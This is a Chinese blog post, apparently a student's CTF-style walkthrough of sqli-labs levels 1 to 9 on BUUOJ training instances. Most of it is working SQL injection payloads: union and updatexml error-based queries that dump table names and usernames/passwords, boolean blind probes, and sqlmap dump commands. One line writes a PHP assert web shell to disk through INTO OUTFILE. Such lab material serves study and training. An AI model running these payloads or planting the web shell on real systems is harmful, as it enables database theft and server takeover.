XAUT sqlibs1--9 实战 Day4

于 2024-07-12 00:25:28 发布
阅读量974 收藏 14
点赞数 26
文章标签: 数据库 web安全 网络 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63089196/article/details/140364932
版权

原文链接:sqli-labs通关(less1~less10)_less-labs 4-6关-CSDN博客

sqli-libs1

http://9ce3de6f-7ac8-42d0-bdfb-63bb96537b57.node5.buuoj.cn/Less-1/?id=1 直接出

http://9ce3de6f-7ac8-42d0-bdfb-63bb96537b57.node5.buuoj.cn/Less-1/?id=1' order by 3--+

http://9ce3de6f-7ac8-42d0-bdfb-63bb96537b57.node5.buuoj.cn/Less-1/?id=1' order by 4--+

http://9ce3de6f-7ac8-42d0-bdfb-63bb96537b57.node5.buuoj.cn/Less-1/?id=-1' union select 1,2,3--+

http://9ce3de6f-7ac8-42d0-bdfb-63bb96537b57.node5.buuoj.cn/Less-1/?id=-1' union select 1,version(),database()--+

http://9ce3de6f-7ac8-42d0-bdfb-63bb96537b57.node5.buuoj.cn/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

MySQL 数据库中,GROUP_CONCAT()是一个非常实用的聚合函数,主要用于将属于一组的相关行的数据项进行合并并以字符串的形式返回。通过本文,我们将深入理解 GROUP_CONCAT() 函数的用法以及在实际场景中的应用。

information_schema 数据库跟 performance_schema 一样,都是 MySQL 自带的信息数据库。其中 performance_schema 用于性能分析,而 information_schema 用于存储数据库元数据(关于数据的数据),例如数据库名、表名、列的数据类型、访问权限等。

information_schema 中的表实际上是视图,而不是基本表,因此,文件系统上没有与之相关的文件。

1. 获取所有表结构(TABLES)

SELECT  *  FROM information_schema.TABLES WHERE  TABLE_SCHEMA='数据库名';  

TABLES表:提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息。各字段说明如下:

Table_schema

数据表所属的数据库名

http://168a514d-229f-48fd-97f0-c7a7617c9515.node5.buuoj.cn/Less-1/?id=-1' union select 1,version(),group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()--+

http://168a514d-229f-48fd-97f0-c7a7617c9515.node5.buuoj.cn/Less-1/?id=-1' union select 1,group_concat(username),group_concat(password) from users--+

【php】assert函数的用法

2012-06-01 10:32:37

assert这个函数在php语言中是用来判断一个表达式是否成立。返回true or false;

例如

<?php

$s = 123;

assert("is_int($s)");

?>

从这个例子可以看到字符串参数会被执行,这跟eval()类似。不过eval($code_str)只是执行符合php编码规范的$code_str。

assert的用法却更详细一点。

http://168a514d-229f-48fd-97f0-c7a7617c9515.node5.buuoj.cn/Less-1/?id=-1' union select 1,version(),'<?php assert($_POST[pass]);?>' into outfile 'C:\Users\星辰大海\Desktop\1.php'--+

下同:

sqli-libs2

http://168a514d-229f-48fd-97f0-c7a7617c9515.node5.buuoj.cn/Less-2/?id=1

http://168a514d-229f-48fd-97f0-c7a7617c9515.node5.buuoj.cn/Less-2/?id=1'

sqli-libs3

http://4dd77904-e062-488a-a1e4-d26fbf534271.node5.buuoj.cn/Less-3/?id=3\

sqli-libs4

http://4dd77904-e062-488a-a1e4-d26fbf534271.node5.buuoj.cn/Less-4/?id=1\

sqli-libs5

http://4dd77904-e062-488a-a1e4-d26fbf534271.node5.buuoj.cn/Less-5/?id=1

http://4dd77904-e062-488a-a1e4-d26fbf534271.node5.buuoj.cn/Less-5/?id=1\

SQL注入中的报错注入方法,当输入带有语法错误的SQL语句导致页面报错时,表明存在SQL注入漏洞。报错注入常用函数包括updatexml和extractvalue,可用于获取数据库版本信息。通过报错注入,可以逐步揭示数据库结构和数据,即使页面不显示查询结果

报错注入过程:报错注入的过程和union注入是差不多的:先找到注入点-->检查是否能产生报错信息-->使用报错函数得到库名-->得到关键表名-->得到列名-->查询关键数据

报错注入属于盲注的一种,要求页面能产生报错信息,不需要显示位,当页面没有显示位用不了union注入时,可以先考虑看看能不能用报错注入。

在ASCII码表中,0x7e这个十六进制数代表符号~,~这个符号在xpath语法中是不存在的,因此总能报错。同理,肯定也有其他字符是XPATH语法不支持的。也是不支持的,因此也可以使用

updatexml(xml_doument,XPath_string,new_value)

第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc

第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。

第三个参数:new_value,String格式,替换查找到的符合条件的数据

updatexml函数是用于更新XML文档中指定节点下的指定属性的函数1234。它可以在XML文档中添加、修改或删除节点和属性,以便对XML数据进行更精细的控制和操作。

updatexml(xml_doument,XPath_string,new_value)

第一个参数:XML的内容

第二个参数:是需要update的位置XPATH路径

第三个参数:是更新后的内容

所以第一和第三个参数可以随便写,只需要利用第二个参数,他会校验你输入的内容是否符合XPATH格式

http://4dd77904-e062-488a-a1e4-d26fbf534271.node5.buuoj.cn/Less-5/?id=1'and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

MySQL中CONCAT函数

功能 将多个字符串连接成一个字符串

语法 CONCAT(str1,str2,…)

返回结果为连接参数产生的字符串。如有任何一个参数为NULL ,则返回值为 NULL。

值得注意的是每次只返回的是一行的数据。

在调用updatexml显错注入的时候为什么要用concat函数?

这个问题很简单。首先updatexml为啥会报错。

UPDATEXML (XML_document, XPath_string, new_value);

第二个参数:XPath_string(Xpath格式的字符串)

我们把第二个参数变成非XPATH格式,自然会报错。

但爆出的是什么信息呢?

SELECT updatexml(1,"/bookstore/.book/title",1)

> 1105 - XPATH syntax error: 'book/title'

>时间:0.001s

他会把校验失败的数据暴出来。其实是方便开发人员调试的。

http://77e6629d-d80d-4fd8-976f-df261cd86389.node5.buuoj.cn/Less-5/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

http://9c772b3e-5858-4419-a637-edfab5e92cb2.node5.buuoj.cn/Less-5/?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1)--+

例子:

users表的结构

使用concat()函数

group_concat()函数:

group_concat()函数是将所有的查询结果拼接成一个字符串返回,不过在不同的字段值之间默认是用逗号隔开的,可以看到返回的值就只有一个值。

像concat()函数那样直接拼接内容,中间没有做隔离,很可能会导致我们无法判断哪些字符是属于哪一个字段的。而group_concat()函数默认是用逗号隔开两行不同查询结果的。当然也支持自己定义隔离的符号,比如

http://f458971c-0877-454b-a574-691cf19eda87.node5.buuoj.cn/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()),1,31),0x7e),1)--+

http://f458971c-0877-454b-a574-691cf19eda87.node5.buuoj.cn/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),1,31),0x7e),1)--+

http://f458971c-0877-454b-a574-691cf19eda87.node5.buuoj.cn/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),32,31),0x7e),1)--+

下同:

sqli-libs6

http://f458971c-0877-454b-a574-691cf19eda87.node5.buuoj.cn/Less-6/?id=1\

下同只是闭合为”

sqli-libs7

http://f458971c-0877-454b-a574-691cf19eda87.node5.buuoj.cn/Less-7/?id=1'

sqli-libs8

布尔盲注:

http://f458971c-0877-454b-a574-691cf19eda87.node5.buuoj.cn/Less-8/?id=1' AND LENGTH((SELECT database()))=8--+ 有显示即为注入成功

http://f458971c-0877-454b-a574-691cf19eda87.node5.buuoj.cn/Less-8/?id=1' AND LEFT((SELECT database()), 1)='a' --+

http://f458971c-0877-454b-a574-691cf19eda87.node5.buuoj.cn/Less-8/?id=1' AND LEFT((SELECT database()), 1)=s' --+

如上测试首字母可以用bp抓包后用字典爆破:

sqli-libs9

http://bbd5228a-b664-4412-8bc7-4428033f6af4.node5.buuoj.cn/Less-9/?id=1

直接用sqlmap暴力破解:

sqlmap -u "http://bbd5228a-b664-4412-8bc7-4428033f6af4.node5.buuoj.cn/Less-9/?id=1" --current-db

sqlmap -u "http://bbd5228a-b664-4412-8bc7-4428033f6af4.node5.buuoj.cn/Less-9/?id=1" --tables -D security

sqlmap -u "http://bbd5228a-b664-4412-8bc7-4428033f6af4.node5.buuoj.cn/Less-9/?id=1" --columns -D security -T users

sqlmap -u "http://bbd5228a-b664-4412-8bc7-4428033f6af4.node5.buuoj.cn/Less-9/?id=1" --dump -D security -T users -C username,password

前轱辘转后轱辘不转思密达_
关注
SQL注入-基于联合查询的数字型GET注入
weixin_46831054的博客
02-16 3670
实验原理 数字型GET注入,其注入点存在于URL中的参数处。 攻击者可以通过构造恶意的get输入参数,利用union select命令进行注入,暴露数据库中存储的信息。 实验一 步骤: 1.访问靶机网站:http://127.0.0.1:456/Less-2/ 登录后,根据网页,给出GET参数 ?id=1 显示出用户名:Dumb,密码:Dumb 注:该实验利用Firefox的插件:Hackbar。没有该插件可到搜索框里输入payload参数。 2.寻找注入点 http://127.0.0.1:456/L
汇编实现快速排序(微机原理课程设计-XAUT
qnmdcnyd的博客
07-07 1104
快速排序本身并不难,难在用汇编语言实现,难点主要在汇编的递归实现 可以先用高级语言编写,然后对照着改写成汇编 高级语言实现 const quickSort = (arr) => { const sort = (arr, left = 0, right = arr.length - 1) => { if (left >= right) { return } let [ i, j ] = [ left, right ] c...
GET基于报错的注入
qq_40710190的博客
10-15 418
GET基于报错的注入 报错注入形式上是两个嵌套的查询,即select…(select…),里面的select被称为子查询,他的执行顺序也是先执行子查询,再执行外面的select,双注入主要涉及到了几个SQL函数: rand()随机函数,返回0~1之间的某个值 floor(a) 取整函数,返回小于等于a,且值最接近a的一个整数 count()聚合函数也称作计数函数,返回查询对象的总数 SQL COUNT(*) 函数 定义和用法 COUNT(*) 函数返回在给定的选择中被选的行数。 语法 SE
报错基于GET的注入
qq_40710190的博客
09-28 275
报错基于GET的注入GET-Error based lesson1 Single quotes-String 判断是数字型还是字符型 这一点还是很好判断的,在有报错提示下的话。这里的例子基于sqli-labs的lesson1和lesson2。 ?id=1' 得到报错 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right synta
GET报错注入
qq_43776408的博客
06-09 664
报错介绍 使用的正常的语句无法显示想要查询的数据,然后我们故意输入错的语句来强迫数据库 爆出数据来 GET单引号报错注入 以less-5为例 原sql语句 select * from admin where id=‘id’ limit 0,1 回顾一下 浏览器输入id=1正确 显示you are in 在输入id=1 显示错误 you have an error in "1’ LIMIT 0,1’ 去掉外引号 ‘1’ LIMIT 0,1 你想啊,输入1是对的 但是输入1\是错的 所以就是多出了一个\
SQL | GET报错注入
m_de_g的博客
12-05 834
SQL | GET报错注入 1.报错注入介绍 2.GET单引号报错注入 3.GET双引号报错注入 4.Sqlmap安全测试
Xaut (formerly Xautomation)-开源
07-17
用于自动化 X11 的 Python 库。 从 Python 模拟鼠标移动和鼠标点击、击键和操作窗口。 改变大写锁定、数字锁定和滚动锁定的状态。 还可以访问 X11 剪贴板。 C 库对于那些希望从另一种语言自动化 X 的人也很有用。
xorg-x11-xauth-1.0.2-7.1.el6.x86_64.rpm
08-18
xorg-x11-xauth-1.0.2-7.1.el6.x86_64.rpm
XAUT-AGV100轮式移动机器人的混合导航系统实验
论文作者针对移动机器人的运动特性,为XAUT-AGV100设计了一种混合导航系统。混合导航系统通常结合了多种导航技术,如惯性导航和路标定位,以增强整体性能。惯性导航利用惯性测量单元(IMU)来跟踪机器人的运动状态,...
/Users/yuwei/Desktop/bbs/xaut-trip/node_modules/.bin/vite: Permission denied
最新发布
04-01
ls -l /Users/yuwei/Desktop/bbs/xaut-trip/node_modules/.bin/vite ``` If the permissions are not set to executable, you can change them using the command: ``` chmod +x /Users/yuwei/Desktop/bbs/xaut-...
13、报错注入(Get)
weixin_41489908的博客
12-02 194
环境sqli-labs less 5 1、我们随便输入’,看到报错信息 可以判断,需要单引号闭合 2、构造查询获取数据库名称语句 http://192.168.1.120/sqli/Less-5/?id=1’ union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),...
GET基于报错的SQL注入
LuckySec
02-11 660
当前用户:select user(); 所有数据库:show databases; 当前数据库:select database(); 当前版本:select version(); mysql常用注释符:#或–空格或/**/ 空格也就是%20 内联注释:/!SQL语句/只有MySQL可以识别,常用来绕过WAF select * from articles where id=id...
1-8 GET报错注入
LoveStarbucks的博客
12-29 256
1-8 GET报错注入 1.报错注入介绍 floor报错注入的原理( https://www.cnblogs.com/xdans/p/5412468.html ) 2.GET单引号报错注入 Sqli-Lab less5 只能使用报错获得我们想要获得的信息 (2)构造报错语句 3.GET双引号报错注入 4.Sqlmap安全测试(前面的测试手写比较麻烦这个是重点) Sqlmap操作跟前面的...
SQL中的GET显错注入
m0_69676459的博客
04-30 609
SQL中GET注入
SQL注入之报错型注入
selecthch的博客
06-09 5725
报错注入的前提:页面上没有显示位但是有sql语句执行错误信息输出。mysql_error()函数作用:返回上一个Mysql操作产生的文本错误信息如:      在用php对mysql进行一些增删改查操作的时候,如果数据库在执行的过程 中遇到错误,此时数据库是有错误回显的,但是这个错误回显不会显示在Web应 用页面中的。       如下是php脚本错误信息需要php.ini 中display_er...
经典的注入语句
数据库天地
10-04 157
经典的注入语句 注意:对于普通的get注入,如果是字符型,前加' 后加 and ''=' 拆半法 ###################################### and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。 and exists (s...
SQL注入--GET注入
liukenn的博客
07-29 5717
一个带get型参数并且存在从数据库中返回数据的网站: http://127.0.0.1/index.php?id=1   可以进行如下尝试检测是否存在注入点: http://127.0.0.1/index.php?id=1 and 1=1 http://127.0.0.1/index.php?id=1 and 1=2 http://127.0.0.1/index.p
get post注入原理
weixin_30360497的博客
05-08 532
一般的http请求不外乎 get 和 post两种,如果过滤掉所有post或者get请求中的参数信息中的非法字符,那么也就实现了防SQL注入。 首先定义请求中不能包含如下字符: '|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare 各个字符用"|"隔开,然后再判断R...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值